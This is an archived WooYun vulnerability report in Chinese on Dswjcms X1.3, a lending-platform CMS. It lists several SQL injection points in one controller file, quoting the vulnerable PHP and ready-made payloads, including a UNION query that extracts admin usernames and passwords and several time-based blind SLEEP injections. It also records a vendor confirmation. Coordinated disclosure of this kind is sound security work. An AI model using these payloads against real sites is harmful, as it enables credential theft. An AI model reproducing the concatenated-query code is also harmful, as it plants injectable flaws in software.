当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143727

漏洞标题:Dswjcms! X1.3 sql注入n多处#2(需要登录会员)

相关厂商:dswjcms.com

漏洞作者: 不能忍

提交时间:2015-09-29 16:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-04: 厂商已经确认,细节仅向厂商公开
2015-10-07: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-28: 细节向核心白帽子及相关领域专家公开
2015-12-08: 细节向普通白帽子公开
2015-12-18: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

很多sql注入在这里了,我就不刷了,打包了!

详细说明:

漏洞文件:/Lib/Action/Home/CenterAction.class.php

public function invest(){
$this->homeVerify();
$refund=M('collection');
$automatic=D('Automatic');
$this->assign('mid',$this->_get('mid'));
$isbid=$this->bidRecords(3,0,$this->_session('user_uid'));
$this->assign('isbid',$isbid);
$isclosed=$this->bidRecords(7,0,$this->_session('user_uid'),1);
$win=$this->bidRecords(9,0,$this->_session('user_uid'),1);
$this->assign('win',$win);
$overdue=$this->overdue($this->_session('user_uid'));//逾期信息
$this->assign('overdue',$overdue);
$uncollected=$this->bidRecords(11,0,$this->_session('user_uid'),1);
$this->assign('isclosed',$isclosed);

if($this->_get('bid') && $this->_get('mid')=='plan'){ //还款计划
$refun=$refund->where('bid='.$this->_get('bid').' and uid='.$this->_session('user_uid'))->order('time ASC')->select(); //mark
$this->assign('refun',$refun);
}


http://localhost/Center/invest/?mid=plan&bid=1) UNION SELECT 1,concat(username,0x2c,password),3,4,5,6,7,8 from ds_admin%23

public function loan(){
$this->homeVerify();
$this->assign('mid',$this->_get('mid'));
$list=$this->borrowUidUnicom($this->_session('user_uid'));
$refund=M('refund');
if($this->_get('bid') && $this->_get('mid')=='plan'){ //还款计划
$refun=$refund->where('bid='.$this->_get('bid'))->order('time ASC')->select();
$borrowing=M('borrowing');
$borrow=$borrowing->field('money')->where('`id`='.$this->_get('bid'))->find();//mark
$interest=$this->interest($this->_session('user_uid'),$borrow['money']);
$this->assign('interest',$interest);
$this->assign('refun',$refun);
}
if($this->_get('bid') && $this->_get('mid')=='flowplan'){ //流转标的还款计划
if($this->_get('nper')>0){//如果有nper说明是流转标,流转标只显示对应期数
$refun=$refund->where('bid='.$this->_get('bid').' and uid='.$this->_session('user_uid'))->order('time ASC')->select(); //mark
}else{
$refun=$refund->where('bid='.$this->_get('bid').' and uid='.$this->_session('user_uid'))->order('time ASC')->select(); //mark
}
$borrowing=M('borrowing');
$borrow=$borrowing->field('money')->where('`id`='.$this->_get('bid'))->find();//mark
$interest=$this->interest($this->_session('user_uid'),$borrow['money']);
$this->assign('interest',$interest);
$this->assign('refun',$refun);
}
$this->assign('list',$list);
$overdue=$this->verdue($this->_session('user_uid'));//逾期信息
$this->assign('overd',$overdue);
$active['center']='active';
$this->assign('active',$active);
$isflo=$this->bidRecords(16,0,$this->_session('user_uid'));
if($isflo){ //筛选需要显示并不重复的正在流转的标
foreach($isflo as $id=>$is){
$bid=$is['actionname']['bid'];
if(in_array($bid,$ar)){ //流转标相同的信息只显示一次
}else{
$ar[]=$bid;
if(!empty($arr[$bid])){
$imd=$arr[$bid]+1;
}else{
$imd=1;
}

$arr[$bid]++;
$count=$refund->field('time')->where(' bid='.$bid.' and uid='.$this->_session('user_uid').' and type=0')->find();//mark
if($count>0){
$isflow[$id]['bid']=$bid;
$isflow[$id]['id']=$imd;
$isflow[$id]['title']=$is['details']['title'];
$isflow[$id]['rates']=$is['details']['rates'];
$isflow[$id]['code']=$is['details']['code'];
$isflow[$id]['type_name']=$is['details']['type_name'];
$isflow[$id]['operation']=$is['actionname']['operation'];
$isflow[$id]['deadline']=$is['actionname']['deadline'];
$isflow[$id]['time']=$count['time'];
}
}
}
}
unset($count);
unset($arr);
unset($isflo);
$this->assign('isflow',$isflow);
$this->display();
}


这里还有一处sql盲注:
public function borrows($id){
$borrowing = M("borrowing");
return $borrowing->where('id='.$id)->field('id,title,rates,deadline,money,state')->find();
}
payload:
http://localhost/Center/borrows/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23

1.jpg


再来一处sql盲注:

public function emailVerify(){
$this->homeVerify();
$userinfo=M('user');
$smtp=M('smtp');
$stmpArr=$smtp->find();
$getfield = $userinfo->where("`id`=".$this->_session('user_uid')." and `email`='".$this->_post('email')."'")->find(); //mark


payload:
http://localhost/Center/emailVerify/
post:email=test') AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
再来一处sql盲注:

public function stationexit(){
$this->homeVerify();
$msgTools = A('msg','Event');
$instation=M('instation');
$result=$instation->where('id='.$this->_get('id'))->delete();//mark
if($result){
$this->success("删除成功");

}else{
$this->error("删除失败");
}
}


payload:
http://localhost/Center/stationexit/test) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--

public function agreement(){
$this->homeVerify();
if(!$this->_get('bid')){
$this->error("操作有误!");
}
$refund=M('refund');
$collection=M('collection');
$re=$refund->where('uid='.$this->_session('user_uid').' and bid='.$this->_get('bid'))->find();//mark
$co=$collection->where('uid='.$this->_session('user_uid').' and bid='.$this->_get('bid'))->find();
if($re || $co){
$boow=reset($this->borrow_unicom($this->_get('bid')));//mark
$userinfo=D('Userinfo');
$userin=$userinfo->field('name,idcard,uid')->relation(true)->where('uid='.$boow['uid'])->find();
if($boow['type']==8){ //机构担保标
$bid_record=$this->lendUser('7',$this->_get('bid'));
$Guarantee = D("Guarantee");
$gcompany=$Guarantee->field('gid')->relation(true)->where('bid='.$this->_get('bid'))->find();//mark


最后两处sql注入:
public function alipayreturn(){
$msgTools = A('msg','Event');
header("Content-Type:text/html; charset=utf-8");
vendor('Alipay.Notify');
$online=M('online');
$list=$online->where('`id`=1')->find();
$alipay_config['partner'] = $list['pid'];
$alipay_config['key'] = $list['checking'];
$alipay_config['sign_type'] = strtoupper('MD5');//签名方式 不需修改
$alipay_config['input_charset']= strtolower('utf-8');//字符编码格式 目前支持 gbk 或 utf-8
$alipay_config['transport'] = 'http';//访问模式,根据自己的服务器是否支持ssl访问,若支持请选择https;若不支持请选择http
$alipayNotify = new AlipayNotify($alipay_config);
$verify_result = $alipayNotify->verifyReturn();
//获取充值
$recharge=M('recharge');
$rechar=$recharge->where('nid='.$this->_get('out_trade_no'))->find();
if($verify_result) {//验证成功 //mark
$recharge->where('nid='.$this->_get('out_trade_no'))->save(array('type'=>2,'audittime'=>time(),'date'=>json_encode($_GET),'handlers'=>'第三方支付')); //mark
这里应该是有两处sql盲注的,一处是select的,一处是update的
http://localhost/Center/alipayreturn/?out_trade_no=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--

漏洞证明:

1.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-04 10:18

厂商回复:

漏洞已找到解决方案,正在着手解决中,感谢作者,所有解决方案都会在官方论坛进行公布修复方案和在下一版本中给予修复

最新状态:

暂无